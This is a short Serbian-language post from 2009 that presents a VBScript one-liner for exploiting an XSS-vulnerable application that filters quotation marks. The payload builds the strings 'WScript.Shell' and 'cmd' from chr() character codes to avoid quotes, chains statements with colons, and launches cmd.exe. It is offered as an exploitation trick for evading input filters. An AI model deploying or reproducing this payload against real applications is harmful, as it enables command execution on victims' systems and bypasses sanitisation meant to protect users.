=/= VBscript one-liner =/=
_ 2009-02-08 23:51:44 _

Imate ranjivu aplikaciju koja ne sankcionise VBscript, ali sankcionise
navodnike i slicne karaktere potrebne za testiranje XSS napada ? Plus ceo kod
mora biti u jednoj liniji.
Na prvi pogled skoro da se ne moze eksploatisati.

Ali, ako iskoristite ugradjene funkcije VBscript-a za rad sa karakterima i ne
tako poznat nacin pisanja one-liner koda u VB-u, dobicete ovako nesto:

 Dim a : Dim b : a = chr(87) + chr(83) + chr(99) + chr(114) + chr(105) +
chr(112) + chr(116) + chr(46) + chr(83) + chr(104) + chr(101) + chr(108) +
chr(108) : b = chr(99) + chr(109) + chr(100) : CreateObject(a).Run b 

Ovaj kod pokrece cmd.exe i koristi dvotacku za razdvanje linija.